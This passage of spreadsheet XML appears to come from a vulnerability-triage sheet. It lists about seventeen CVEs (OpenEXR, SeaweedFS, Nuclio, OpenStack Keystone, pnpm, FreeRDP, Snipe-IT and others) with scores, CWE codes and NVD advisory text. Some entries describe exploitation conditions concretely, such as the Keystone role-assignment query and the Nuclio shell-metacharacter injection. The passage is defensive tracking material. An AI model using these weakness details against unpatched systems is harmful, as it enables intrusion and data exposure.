          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="R614" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13, exrmultiview can write past a heap allocation when it combines two attacker-supplied, individually valid scanline EXR files whose union dataWindow is not aligned to one view's channel subsampling. The utility allocates sampled channel storage using a truncated union_width / xSampling, then reads the sampled input through a Slice based on the misaligned union window, producing a heap out-of-bounds write. The trigger is normal public-tool processing, such as exrmultiview left A.exr right B.exr out.exr with crafted but valid inputs, so this is not solely an API or caller-precondition issue. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="S614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68515</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75369</t>
        </is>
      </c>
      <c r="D615" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E615" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F615" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G615" s="5" t="inlineStr"/>
      <c r="H615" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I615" s="5" t="inlineStr"/>
      <c r="J615" s="5" t="inlineStr"/>
      <c r="K615" s="5" t="inlineStr"/>
      <c r="L615" s="5" t="inlineStr"/>
      <c r="M615" s="5" t="inlineStr"/>
      <c r="N615" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O615" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P615" s="5" t="inlineStr"/>
      <c r="Q615" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R615" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read vulnerability in the CAN::Application::parsePerformFunctionMessage component of SpaceDot AcubeSAT OBC software commit eaf90ec allows attackers to cause a Denial of Service (DoS) via supplying a crafted CAN message.</t>
        </is>
      </c>
      <c r="S615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75369</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77611</t>
        </is>
      </c>
      <c r="D616" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E616" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F616" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G616" s="5" t="inlineStr"/>
      <c r="H616" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I616" s="5" t="inlineStr"/>
      <c r="J616" s="5" t="inlineStr"/>
      <c r="K616" s="5" t="inlineStr"/>
      <c r="L616" s="5" t="inlineStr"/>
      <c r="M616" s="5" t="inlineStr"/>
      <c r="N616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O616" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P616" s="5" t="inlineStr"/>
      <c r="Q616" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R616" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system for files and blobs. In versions prior to 4.40, an authenticated S3 principal with permissions scoped to a nested object key can overwrite a different object outside that scope by calling PutObjectAcl on the key it is allowed to access. The handler authorizes the request against the requested nested key but then writes the updated entry back to the bucket root rather than the key's actual parent directory, so an ACL change on allowed/protected.txt is instead applied to protected.txt at the bucket root. Because the update carries the full entry rather than only ACL metadata, an existing target object is overwritten with the content, metadata, owner information, and ACL of the scoped object, bypassing the object-level action scoping configured through the static S3 identity file. This issue is fixed in version 4.40.</t>
        </is>
      </c>
      <c r="S616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77611</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77847</t>
        </is>
      </c>
      <c r="D617" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E617" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F617" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G617" s="5" t="inlineStr"/>
      <c r="H617" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I617" s="5" t="inlineStr"/>
      <c r="J617" s="5" t="inlineStr"/>
      <c r="K617" s="5" t="inlineStr"/>
      <c r="L617" s="5" t="inlineStr"/>
      <c r="M617" s="5" t="inlineStr"/>
      <c r="N617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O617" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P617" s="5" t="inlineStr"/>
      <c r="Q617" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R617" s="5" t="inlineStr">
        <is>
          <t>Tycon Systems TPDIN-Monitor-WEB3 versions 2.2.9 and prior are vulnerable to a use of hard-coded credential vulnerability. This could allow an attacker to intercept sensitive information or credentials.</t>
        </is>
      </c>
      <c r="S617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77847</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79617</t>
        </is>
      </c>
      <c r="D618" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E618" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F618" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G618" s="5" t="inlineStr"/>
      <c r="H618" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I618" s="5" t="inlineStr"/>
      <c r="J618" s="5" t="inlineStr"/>
      <c r="K618" s="5" t="inlineStr"/>
      <c r="L618" s="5" t="inlineStr"/>
      <c r="M618" s="5" t="inlineStr"/>
      <c r="N618" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O618" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P618" s="5" t="inlineStr"/>
      <c r="Q618" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="R618" s="5" t="inlineStr">
        <is>
          <t>Incorrect Permission Assignment for Critical Resource vulnerability in TÜBİTAK BİLGEM Software Technologies Research Institute Pardus LightDM Greeter allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Pardus LightDM Greeter: before 0.4.15.</t>
        </is>
      </c>
      <c r="S618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79617</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79754</t>
        </is>
      </c>
      <c r="D619" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E619" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F619" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G619" s="5" t="inlineStr"/>
      <c r="H619" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I619" s="5" t="inlineStr"/>
      <c r="J619" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K619" s="5" t="inlineStr"/>
      <c r="L619" s="5" t="inlineStr"/>
      <c r="M619" s="5" t="inlineStr"/>
      <c r="N619" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O619" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P619" s="5" t="inlineStr"/>
      <c r="Q619" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R619" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. From version 1.6.19 to before version 1.17.2, Nuclio's Dashboard build pipeline does not sanitize the spec.build.tempDir field before using it to construct a shell command. When the Kaniko container builder is enabled, a user with function-create permission can inject shell metacharacters into this field and achieve arbitrary command execution inside the Dashboard container, which runs with a Kubernetes service account holding wildcard access to Secrets, Pods, Jobs, and Deployments in its namespace. This issue has been patched in version 1.17.2.</t>
        </is>
      </c>
      <c r="S619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79754</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80183</t>
        </is>
      </c>
      <c r="D620" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E620" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F620" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G620" s="5" t="inlineStr"/>
      <c r="H620" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I620" s="5" t="inlineStr"/>
      <c r="J620" s="5" t="inlineStr"/>
      <c r="K620" s="5" t="inlineStr"/>
      <c r="L620" s="5" t="inlineStr"/>
      <c r="M620" s="5" t="inlineStr"/>
      <c r="N620" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O620" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P620" s="5" t="inlineStr"/>
      <c r="Q620" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R620" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Keystone before 29.0.3, any authenticated user holding role:reader on any project can list every project-scoped role assignment under any domain by passing a domain ID as scope.project.id with include_subtree to the GET /v3/role_assignments endpoint. The domain's project record has domain_id=null, causing the policy domain_id check to pass for any caller. With include_names, the response discloses the names and home-domain IDs of every user, group, project, and role involved. The literal "default" domain ID works against any deployment created with keystone-manage bootstrap. An attacker can harvest domain IDs from the response and repeat the query to map role assignments across the entire cloud. This is caused by misuse of "None" in 
list_role_assignments_for_tree.</t>
        </is>
      </c>
      <c r="S620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80183</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81330</t>
        </is>
      </c>
      <c r="D621" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E621" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F621" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G621" s="5" t="inlineStr"/>
      <c r="H621" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I621" s="5" t="inlineStr"/>
      <c r="J621" s="5" t="inlineStr"/>
      <c r="K621" s="5" t="inlineStr"/>
      <c r="L621" s="5" t="inlineStr"/>
      <c r="M621" s="5" t="inlineStr"/>
      <c r="N621" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O621" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P621" s="5" t="inlineStr"/>
      <c r="Q621" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R621" s="5" t="inlineStr">
        <is>
          <t>The C6 ear camera transmits live video to the EarVision Android application over unencrypted UDP streams. The application manifest permits cleartext traffic, and captured network traffic contains reconstructable JPEG or WEBP video frames transmitted over UDP. An attacker within local wireless range may capture and reconstruct the live video stream without transport encryption.</t>
        </is>
      </c>
      <c r="S621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81330</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82392</t>
        </is>
      </c>
      <c r="D622" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E622" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F622" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G622" s="5" t="inlineStr"/>
      <c r="H622" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I622" s="5" t="inlineStr"/>
      <c r="J622" s="5" t="inlineStr"/>
      <c r="K622" s="5" t="inlineStr"/>
      <c r="L622" s="5" t="inlineStr"/>
      <c r="M622" s="5" t="inlineStr"/>
      <c r="N622" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O622" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P622" s="5" t="inlineStr"/>
      <c r="Q622" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R622" s="5" t="inlineStr">
        <is>
          <t>pnpm is a package manager. Prior to 10.34.5 and from 11.0.0 until 11.11.0, pnpm parses the package name from attacker-controlled pnpm-lock.yaml packages keys with dp.parse(depPath).name and uses it without validation in deps/graph-builder/src/lockfileToDepGraph.ts and pnpm11/deps/graph-builder/src/lockfileToDepGraph.ts. The name reaches path.join(modules, pkgName), storeController.importPackage, and pnpm11/lockfile/to-pnp/src/index.ts, allowing package contents to be written outside node_modules when a user runs pnpm install. When dangerouslyAllowAllBuilds or a matching allowBuilds entry permits lifecycle scripts, the escaped package can execute code with the user's privileges. This issue is fixed in versions 10.34.5 and 11.11.0.</t>
        </is>
      </c>
      <c r="S622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82392</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83961</t>
        </is>
      </c>
      <c r="D623" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E623" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F623" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G623" s="5" t="inlineStr"/>
      <c r="H623" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I623" s="5" t="inlineStr"/>
      <c r="J623" s="5" t="inlineStr"/>
      <c r="K623" s="5" t="inlineStr">
        <is>
          <t>adobe:coldfusion</t>
        </is>
      </c>
      <c r="L623" s="5" t="inlineStr"/>
      <c r="M623" s="5" t="inlineStr"/>
      <c r="N623" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O623" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P623" s="5" t="inlineStr"/>
      <c r="Q623" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R623" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Authentication vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain limited read and write access. The vulnerable component is restricted to an administrative network zone by default. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="S623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83961</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84989</t>
        </is>
      </c>
      <c r="D624" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E624" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F624" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G624" s="5" t="inlineStr"/>
      <c r="H624" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I624" s="5" t="inlineStr"/>
      <c r="J624" s="5" t="inlineStr"/>
      <c r="K624" s="5" t="inlineStr"/>
      <c r="L624" s="5" t="inlineStr"/>
      <c r="M624" s="5" t="inlineStr"/>
      <c r="N624" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O624" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P624" s="5" t="inlineStr"/>
      <c r="Q624" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R624" s="5" t="inlineStr">
        <is>
          <t>ntopng is a web-based network traffic monitoring application. In versions 6.7.0 through 6.7.260717, two REST v2 endpoints that manage ntopng's tag/badge feature — `POST /lua/rest/v2/delete/tag/tag.lua` and `POST /lua/rest/v2/edit/tag/tag.lua` — perform no authorization check at all. Any authenticated user, including a non-administrator ("unprivileged") account, can delete or rename any tag in the system, including tags created by an administrator. Version 6.7.260718 contains a fix.</t>
        </is>
      </c>
      <c r="S624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84989</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85089</t>
        </is>
      </c>
      <c r="D625" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E625" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F625" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G625" s="5" t="inlineStr"/>
      <c r="H625" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I625" s="5" t="inlineStr"/>
      <c r="J625" s="5" t="inlineStr"/>
      <c r="K625" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="L625" s="5" t="inlineStr"/>
      <c r="M625" s="5" t="inlineStr"/>
      <c r="N625" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O625" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P625" s="5" t="inlineStr"/>
      <c r="Q625" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R625" s="5" t="inlineStr">
        <is>
          <t>FreeRDP versions 3.0.0 through 3.30.0 (before 3.31.0) transmit uninitialized heap memory in Save Session Info PDU reserved padding fields. Three PDU writers in libfreerdp/core/info.c (rdp_write_logon_info_v2, rdp_write_logon_info_plain, and rdp_write_logon_info_ex) use Stream_Seek instead of Stream_Zero for reserved pad bytes (up to 576 bytes), leaving previously freed heap contents in the outgoing PDU. Because the send buffer is allocated with malloc (not zeroed), stale heap data — which may include cleartext credentials from prior sessions — can be sent to the receiving peer. FreeRDP-based servers using rdpUpdate::SaveSessionInfo and freerdp-proxy (which forwards these PDUs) are affected, allowing disclosure of server/proxy process memory to a downstream client.</t>
        </is>
      </c>
      <c r="S625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85089</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86204</t>
        </is>
      </c>
      <c r="D626" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E626" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F626" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G626" s="5" t="inlineStr"/>
      <c r="H626" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I626" s="5" t="inlineStr"/>
      <c r="J626" s="5" t="inlineStr"/>
      <c r="K626" s="5" t="inlineStr"/>
      <c r="L626" s="5" t="inlineStr"/>
      <c r="M626" s="5" t="inlineStr"/>
      <c r="N626" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O626" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P626" s="5" t="inlineStr"/>
      <c r="Q626" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R626" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.39.2 fail to limit JSON payload size in ModalFormResponsePacket handling, allowing authenticated players to cause denial of service. Attackers can send modal form response packets with massive JSON arrays to exhaust server memory and CPU resources, rendering the server unresponsive.</t>
        </is>
      </c>
      <c r="S626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86204</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86757</t>
        </is>
      </c>
      <c r="D627" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E627" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F627" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G627" s="5" t="inlineStr"/>
      <c r="H627" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I627" s="5" t="inlineStr"/>
      <c r="J627" s="5" t="inlineStr"/>
      <c r="K627" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L627" s="5" t="inlineStr"/>
      <c r="M627" s="5" t="inlineStr"/>
      <c r="N627" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O627" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P627" s="5" t="inlineStr"/>
      <c r="Q627" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R627" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly gate access to encrypted custom-field values in asset form templates for listbox, textarea, markdown-textarea, and date/datetime picker elements. Authenticated users with assets.edit, assets.checkin, assets.checkout, or assets.audit permissions can read plaintext encrypted custom field values by opening asset forms, bypassing the assets.view.encrypted_custom_fields permission check.</t>
        </is>
      </c>
      <c r="S627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86757</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86758</t>
        </is>
      </c>
      <c r="D628" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E628" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F628" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G628" s="5" t="inlineStr"/>
      <c r="H628" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I628" s="5" t="inlineStr"/>
      <c r="J628" s="5" t="inlineStr"/>
      <c r="K628" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L628" s="5" t="inlineStr"/>
      <c r="M628" s="5" t="inlineStr"/>
      <c r="N628" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O628" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P628" s="5" t="inlineStr"/>
      <c r="Q628" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="R628" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly enforce the viewKeys authorization gate in CSV export and API index endpoints, allowing authenticated users with only licenses.view permission to access product keys. Attackers can download all license keys in bulk via CSV export or validate candidate keys through API response discrepancies without needing the viewKeys permission.</t>
        </is>
      </c>
      <c r="S628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86758</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86759</t>
        </is>
      </c>
      <c r="D629" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E629" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F629" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G629" s="5" t="inlineStr"/>
      <c r="H629" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I629" s="5" t="inlineStr"/>
      <c r="J629" s="5" t="inlineStr"/>
      <c r="K629" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L629" s="5" t="inlineStr"/>
      <c r="M629" s="5" t="inlineStr"/>
      <c r="N629" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O629" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P629" s="5" t="inlineStr"/>
      <c r="Q629" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R629" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to authorize the POST /hardware/history endpoint, allowing any authenticated user to reassign arbitrary assets and modify audit logs. Attackers can submit a CSV file to reassign assets across companies and inject fraudulent audit trail entries, compromising inventory integrity and accountability.</t>
        </is>
      </c>
      <c r="S629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86759</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86765</t>
        </is>
      </c>
      <c r="D630" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E630" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F630" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G630" s="5" t="inlineStr"/>
      <c r="H630" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I630" s="5" t="inlineStr"/>
      <c r="J630" s="5" t="inlineStr"/>
      <c r="K630" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
